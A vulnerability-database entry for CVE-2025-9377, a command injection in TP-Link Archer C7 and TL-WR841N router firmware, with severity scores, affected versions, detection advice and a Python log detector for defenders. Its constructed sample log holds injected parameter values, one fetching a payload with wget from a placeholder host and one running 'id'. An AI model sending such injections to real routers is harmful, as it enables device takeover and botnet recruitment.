cbcvebase.
CVE-2025-9377
published 2025-08-29

Priority: P1, 81 (high)
CVSS 3.1: 7.2 high (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
CISA Known Exploited Vulnerabilities: listed, remediation due 2025-09-24
Exploited in the wild: yes
EPSS: 11.75% (95.5th percentile)
An authenticated remote command execution (RCE) vulnerability exists in the Parental Control page on TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9. This issue affects Archer C7(EU) V2 before 241108 and TL-WR841N/ND(MS) V9 before 241108. Both products have reached end-of-life (EOL) status; the vendor recommends purchasing a newer product to ensure better performance and security. If replacement is not an option in the short term, use the second reference link to download and install the patch(es).

Affected (5 ranges)

Vendor                Product               Version range   Fixed in
tp-link               archer_c7_firmware    < 241108        241108
tp-link               tl-wr841n_firmware    < 241108        241108
tp-link               tl-wr841nd_firmware   < 241108        241108
tp-link_systems_inc   archer_c7_v2          < 241108        241108
tp-link_systems_inc   tl-wr841n_nd_v9       < 241108        241108

Detection & IOCs (extracted from sources)

  • CVE-2025-9377 is an OS command injection located in the Parental Control page of the affected TP-Link routers (Archer C7(EU) V2 and TL-WR841N/ND(MS) V9). Focus detection on HTTP requests to the Parental Control page whose parameters contain shell metacharacters or otherwise anomalous input.
  • CVE-2025-9377 is chained with CVE-2023-50224 (authentication bypass) to achieve unauthenticated RCE. Detection should look for exploitation of both CVEs in sequence against the same source/destination pair.
  • Post-exploitation activity associated with this CVE includes the Quad7 botnet converting compromised routers into proxies and traffic relays. Monitor for unexpected outbound proxy or relay traffic originating from the routers' management addresses.
  • Threat actors operating from routers compromised via this chain have been observed conducting password-spray attacks against cloud services and Microsoft 365. Correlate router compromise indicators with downstream credential-spray telemetry.
  • Chinese threat actors have been observed relaying malicious traffic through routers compromised via this CVE to blend in with legitimate traffic. Look for unusual routing or tunnelling behaviour originating from TP-Link router management interfaces.
  • On its own, exploitation requires authentication; because CVE-2023-50224 (auth bypass) is chained with it to enable unauthenticated RCE, detections must not assume that a valid session precedes the injected request.
  • Both affected products have reached end-of-life. Patched firmware (241108) exists, but the vendor recommends hardware replacement, so deployed detections should account for the likelihood that many devices will remain unpatched indefinitely.
  • CISA's KEV remediation due date (binding on federal civilian agencies under BOD 22-01) is 2025-09-24. After this date, unpatched devices in federal environments should be treated as compromised until proven otherwise.
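The detection logic described in the bullets above (shell metacharacters in Parental Control page parameters, plus per source/destination correlation so that an unauthenticated hit is flagged rather than ignored) can be exercised over access logs. The following is an added example written for this page, not code from TP-Link, CISA or any of the cited sources. The Parental Control page path, the log format, the credential-cookie convention and every log line are constructed for illustration; the real path on the device may differ, and "a 200 on the page without any credential" is only a heuristic for a bypass, not a signature for CVE-2023-50224.

```python
"""Toy detector for the CVE-2025-9377 exploitation pattern over constructed access logs.

Assumptions (illustrative, not from the advisory): the page path, the log format
"src dst [ts] \"METHOD target HTTP/1.x\" status \"cookie\"", and the sample lines.
"""
import re
from urllib.parse import unquote, urlsplit

# Assumed path of the Parental Control page (hypothetical; real path may differ).
PARENTAL_CONTROL_PATH = "/userRpm/ParentalCtrlRpm.htm"

# Characters that let a parameter value break out of a shell command string.
SHELL_META = re.compile(r"[;&|`$<>\n]")

# Constructed log format: src dst [ts] "METHOD target HTTP/1.x" status "cookie"
LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<dst>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)

# Constructed sample log: one authenticated injection, one unauthenticated one
# preceded by a credential-less 200 on the page, and benign traffic.
SAMPLE_LOG = """\
203.0.113.5 192.168.0.1 [29/Aug/2025:10:00:01 +0000] "GET /userRpm/LoginRpm.htm?Save=Save HTTP/1.1" 200 "Authorization=Basic%20YWRtaW46YWRtaW4="
203.0.113.5 192.168.0.1 [29/Aug/2025:10:00:03 +0000] "GET /userRpm/ParentalCtrlRpm.htm?parentMac=00-11-22-33-44-55;wget%20http://203.0.113.9/x%20-O%20/tmp/x HTTP/1.1" 200 "Authorization=Basic%20YWRtaW46YWRtaW4="
198.51.100.7 192.168.0.1 [29/Aug/2025:10:05:10 +0000] "GET /userRpm/ParentalCtrlRpm.htm?parentMac=00-11-22-33-44-55 HTTP/1.1" 200 ""
198.51.100.7 192.168.0.1 [29/Aug/2025:10:05:12 +0000] "POST /userRpm/ParentalCtrlRpm.htm?desc=test%60id%60 HTTP/1.1" 200 ""
192.168.0.20 192.168.0.1 [29/Aug/2025:10:07:00 +0000] "GET /userRpm/ParentalCtrlRpm.htm?parentMac=AA-BB-CC-DD-EE-FF HTTP/1.1" 200 "Authorization=Basic%20YWRtaW46YWRtaW4="
"""


def decode_params(query):
    """Split a query string on '&' and percent-decode keys and values.

    Done by hand (not parse_qsl) so ';' inside a value survives as data and is
    seen by the metacharacter check.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["params"] = decode_params(url.query)
    return rec


def analyse(log_text):
    """Flag Parental Control requests carrying shell metacharacters.

    Each finding records whether the request itself carried a credential and
    whether the same src/dst pair previously reached the page with no credential
    and still got a 200 (the heuristic bypass indicator for the chained CVE).
    """
    unauth_seen = set()  # (src, dst) pairs that got a credential-less 200 on the page
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"].lower() != PARENTAL_CONTROL_PATH.lower():
            continue
        pair = (rec["src"], rec["dst"])
        has_credential = rec["cookie"] != ""
        if not has_credential and rec["status"] == "200":
            unauth_seen.add(pair)
        tainted = {k: v for k, v in rec["params"].items() if SHELL_META.search(v)}
        if not tainted:
            continue
        findings.append({
            "src": rec["src"],
            "dst": rec["dst"],
            "ts": rec["ts"],
            "params": tainted,
            "credential_present": has_credential,
            "unauth_access_seen": pair in unauth_seen,
        })
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        chain = "possible auth-bypass chain" if f["unauth_access_seen"] else "authenticated"
        print(f"{f['ts']} {f['src']} -> {f['dst']} [{chain}] {f['params']}")
```

The point the second bullet list item makes is visible in the output: the second finding has no credential at all, and a rule that keyed only on "requests after a successful login" would have missed it. In a real deployment the path and cookie convention would be taken from the device's actual firmware, and the per-pair correlation would be bounded by a time window rather than kept for the whole log.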

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         3.1       7.2     HIGH       CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd         4.0       8.6     HIGH       CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck             8.6     HIGH
cisa                  8.6     HIGH